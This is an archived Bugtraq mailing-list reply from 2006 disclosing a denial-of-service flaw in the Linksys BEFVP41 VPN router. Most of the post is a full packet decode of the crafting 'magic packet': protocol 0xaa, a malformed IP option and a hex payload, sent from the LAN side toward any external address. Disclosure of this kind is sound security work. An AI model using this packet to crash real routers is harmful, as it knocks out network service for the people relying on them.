| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 17 Jan 2006 20:44:14 -0000
From: paul14075@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Linksys VPN Router (BEFVP41) DoS Vulnerability
I still havent tested the device from the WAN-side.
The packet does not crash the router if it is addressed to the router. To the crash the router (from the LAN-side, anyway), it must be addressed to an external (WAN-side) IP address.
example:
router is 192.168.1.1
evil_pc is 192.168.1.101 (evil_pc is a PC attached to one of the ethernet ports on the router.)
evil_pc sends the magic packet to ANY external IP address, for example, www.google.com. The router will then crash, and need to be rebooted.
magic packet:
No. Time Source Destination Protocol Info
11576 989.558120 192.168.1.101 67.8.x.x IP Unknown (0xaa)
Frame 11576 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 3com_cc:57:86 (00:10:5a:cc:57:86), Dst: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Destination: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Source: 3com_cc:57:86 (00:10:5a:cc:57:86)
Type: IP (0x0800)
Internet Protocol, Src: 192.168.1.101 (192.168.1.101), Dst: 67.8.x.x (67.8.x.x)
Version: 4
Header length: 24 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 44
Identification: 0x04d2 (1234)
Flags: 0x00
Fragment offset: 0
Time to live: 255
Protocol: Unknown (0xaa)
Header checksum: 0x062a [correct]
Source: 192.168.1.101 (192.168.1.101)
Destination: 67.8.x.x (67.8.x.x)
Options: (4 bytes)
Unknown (0xe4) (with too-short option length = 0 bytes)
Data (20 bytes)
0000 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 ABCDEFGHIJKLMNOP
0010 52 53 54 55 RSTU
Powered by blists - more mailing lists